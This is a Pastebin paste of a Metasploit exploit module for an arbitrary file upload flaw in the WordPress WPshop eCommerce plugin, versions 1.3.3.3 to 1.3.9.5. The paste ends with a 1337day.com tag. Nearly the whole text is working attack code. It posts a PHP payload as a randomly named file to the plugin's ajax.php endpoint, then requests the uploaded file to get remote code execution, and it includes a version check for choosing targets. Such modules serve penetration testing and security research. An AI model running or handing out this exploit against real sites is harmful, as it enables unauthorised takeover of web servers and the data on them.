Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This module requires Metasploit: http://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::HTTP::Wordpress
- include Msf::Exploit::FileDropper
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',
- 'Description' => %q{
- This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin
- from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote
- code execution. This module has been tested successfully on WordPress WPshop eCommerce
- 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.
- },
- 'Author' =>
- [
- 'g0blin', # Vulnerability Discovery, initial msf module
- 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['WPVDB', '7830'],
- ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
- ],
- 'Privileged' => false,
- 'Platform' => 'php',
- 'Arch' => ARCH_PHP,
- 'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],
- 'DisclosureDate' => 'Mar 09 2015',
- 'DefaultTarget' => 0)
- )
- end
- def check
- check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')
- end
- def exploit
- php_page_name = rand_text_alpha(5 + rand(5)) + '.php'
- data = Rex::MIME::Message.new
- data.add_part('ajaxUpload', nil, nil, 'form-data; name="elementCode"')
- data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"wpshop_file\"; filename=\"#{php_page_name}\"")
- post_data = data.to_s
- res = send_request_cgi(
- 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),
- 'method' => 'POST',
- 'ctype' => "multipart/form-data; boundary=#{data.bound}",
- 'data' => post_data
- )
- if res
- if res.code == 200 && res.body =~ /#{php_page_name}/
- print_good("#{peer} - Payload uploaded as #{php_page_name}")
- register_files_for_cleanup(php_page_name)
- else
- fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
- end
- else
- fail_with(Failure::Unknown, "#{peer} - Server did not answer")
- end
- print_status("#{peer} - Calling payload...")
- send_request_cgi(
- { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },
- 5
- )
- end
- end
- # 1337day.com [2015-04-27] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement